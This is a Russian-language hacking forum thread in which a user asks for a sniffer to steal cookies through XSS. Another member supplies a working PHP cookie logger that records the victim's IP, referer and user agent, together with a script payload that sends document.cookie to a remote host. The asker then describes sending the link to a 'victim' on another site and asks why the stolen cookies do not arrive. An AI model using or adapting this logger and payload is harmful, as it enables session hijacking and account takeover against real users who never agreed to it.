Подскажите сниффер

Discussion in 'Песочница' started by amanow, 21 May 2021.

  1. amanow

    amanow New Member

    Joined:
    20 May 2021
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Здравствуйте уважаемые форумчане может есть у кого нибудь снифер для кражи куки через хсс поделитесь пж заранее спасибо
     
  2. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,403
    Likes Received:
    882
    Reputations:
    859
    PHP:
    <?php
    if (isset($_GET['cookie']))
    {
    $ip=getenv("Remote_addr");
    $real_ip=getenv("HTTP_X_FORWARDED_FOR");
    $otkuda=getenv("HTTP_REFERER");
    $browser=getenv("HTTP_USER_AGENT");
        
    $text "New cookie accept from \t$real_ip\t at "date('l jS \of F Y h:i:s A')." REFERER: $otkuda | UA: $browser";
    $text .= "\n".str_repeat("="22) . "\n" $_GET['cookie']."\n".str_repeat("="22)."\n";
    $file fopen("./sniff.txt""a");
    fwrite($file$text);
    fclose($file);
    }
    ?>
    Отправляем на него:

    <script>img = new Image();img.src="https://site.com/sniff.php?cookie="+document.cookie;</script>
     
    _________________________
  3. amanow

    amanow New Member

    Joined:
    20 May 2021
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0

    Большое спасибо получилось ) Скажите пожалуйста куда подставлять полученные куки в opere
     
  4. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,403
    Likes Received:
    882
    Reputations:
    859
    Такие простые вопросы можно и за гуглить, если не можете найти ответ потом уже спрашивайте на форуме, или сразу задавайте вопрос в развернутом виде

    ___addons.opera.com/ru/extensions/details/edit-this-cookie/
     
    _________________________
    amanow, erwerr2321, Spinus and 2 others like this.
  5. amanow

    amanow New Member

    Joined:
    20 May 2021
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0

    Я извиняюсь не подскажите есть сайт на котором есть xss когда я пишу <script>alert(document.cookie)</script> он мне показыват мои куки но когда я пишу ваш код и даю жертве ссылку <script src="http://f0544168.xsph.ru/img.php?cookie="+document.cookie;></script> и он по ней переходит его куки мне на хост не приходят почему
     
  6. amanow

    amanow New Member

    Joined:
    20 May 2021
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    хоть кто нибудь помогите пожалуйста
     
  7. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,403
    Likes Received:
    882
    Reputations:
    859
    Я же выше писал:
    Ну а дальше по ситуации, смотря какие обстоятельства...
     
    _________________________
  8. amanow

    amanow New Member

    Joined:
    20 May 2021
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    я создал на хосте скрипт snif.php поставил ваш код в этот файл проверил скрпит на своем сайте где тоже есть xss куки пришли НО когда я даю жертве на другом сайте ссылку на уязвимую страницу куки не приходят ) подумал может нету тут xss закрыли и просто ради интиреса на форуме того сайта написал <script>alert(document.cookie)</script> сайт показывает мне мои куки
     
    #8 amanow, 22 May 2021
    Last edited: 22 May 2021
Loading...